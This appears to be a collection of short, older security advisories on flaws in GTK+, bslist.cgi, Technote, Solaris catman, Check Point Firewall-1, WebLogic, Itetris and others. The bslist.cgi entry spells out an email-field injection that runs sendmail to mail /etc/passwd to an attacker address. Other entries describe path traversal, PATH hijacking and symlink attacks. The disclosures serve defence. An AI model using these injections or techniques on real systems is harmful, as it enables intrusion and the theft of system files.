A problem exists in the Gimp Toolkit that could allow a user elevated privileges. The problem occurs in the ability to load modules with the GTK_MODULES environment variable. It is possible to specify a path to modules that may not be part of the GTK+ package using this environment variable. By doing so, a custom crafted module can be loaded by the toolkit. Once loaded by the toolkit, the module is executed. This issue makes it possible for a user with malicious intent to potentially gain elevated privileges, overwrite system files, or execute arbitrary and potentially dangerous code.
An input validation vulnerability exists in Brian Stanback's bslist.cgi, a script designed to coordinate mailing lists. The script fails to properly filter ';' characters from the user-supplied email addresses collected by the script. As a result, maliciously-formed values for this field can cause the the script to run arbitrary shell commands with the privilege level of the web server. This can be exploited by signing up for the mailing list with the email address of 'hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd'
The script fails to properly filter ';' characters from the user-supplied email address collected by the script. As a result, maliciously-formed values for this field can cause the the script to run arbitrary shell commands with the privilege level of the web server. An attacker can enter their email address as <whitehatjoe@hotmail.com> and 'hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd', which will cause the server to mail a confirmation letter along with the passwd file to the attacker.
A script that ships with Technote, print.cgi, accepts a parameter called 'board'. This remotely-supplied variable is used as a filename when the open() function is called. In addition to allowing the attacker to specify a file to be opened remotely, the variable is not checked for '../' character sequences. As a result, a malicious remote user can specify an arbitrary file on the file system as this variable (by using ../ sequences followed by its real path), which will be opened by the script. Its contents will then be disclosed to the attacker.
catman is a utility for creating preformatted man pages, distributed as part of the Solaris Operating Environment. A problem exists which could allow local users to overwrite or corrupt files owned by other users. The problem occurs in the creation of temporary files by the catman program. Upon execution, catman creates files in the /tmp directory using the file name sman_<pid>, where pid is the Process ID of the running catman process. The creation of a symbolic link from /tmp/sman_<pid> to a file owned and writable by the user executing catman will result in the file being overwritten, or in the case of a system file, corrupted. This makes it possible for a user with malicious intent to overwrite or corrupt files owned by other users, and potentially overwrite or corrupt system files.
Check Point Software's VPN-1 and Firewall-1 products contain a vulnerability in their 'Fast Mode' option that may allow an attacker to bypass access control restrictions and access certain blocked services. Fast Mode is a setting that turns off analysis of packets in tcp sessions after the TCP 3-way handshake has completed for speed-crtitical services. If this setting is enabled on a firewall, it may be possible for a remote attacker to access blocked services on the host protected by the firewall using fastmode. It is also reportedly possible to access hosts at least one hop away on the same interface as the target host being protected.
Infinite Interchange is a multi function email server which supports most common internet protocols. An example of various functions include an http server and webmail interface. Unfortunately Interchange is subject to a denial of service. By requesting a malformed POST command to the HTTP server port comprised of approx 963 bytes, Interchange will crash. A restart of the service is required in order to gain normal functionality. This vulnerability may be the result of a buffer overflow, although not verified this could lead to the execution of arbitrary code on the target host.
Itetris is a clone of the popular Tetris puzzle game for linux systems. The svgalib version of Itetris is installed setuid root so that it may access video hardware when run by a regular user. Itetris contains a vulnerability which may allow unprivileged users to execute arbitrary commands as root. Itetris uses the system() function to execute gunzip when uncompressing font files. Unfortuntely it does so in a very insecure way -- relying on gunzip being located in directories specified in the PATH environment variable. It is possible to exploit this vulnerability if an attacker sets PATH to include a directory under his/her control in which a 'gunzip' is found instead of or before the real location.
BEA Systems WebLogic Server is vulnerable to an unchecked buffer vulnerability in a particular handler for URL requests that begin with two dots '..'. Depending on the data entered into the buffer, WebLogic Server could be forced to crash or arbitrary code could be executed on the system in the security context of the web server. In the event that random data was sent in order to crash the server, restarting the application would be required in order to regain normal functionality.
It is possible for a user to cause CPU utilization DoS by sending malformed arguments to the mstask.exe service, which will cause the CPU utilization to spike. By default, mstask.exe enables connections through the local host only. A restart of the system is required in order to gain normal functionality.
Services By CQR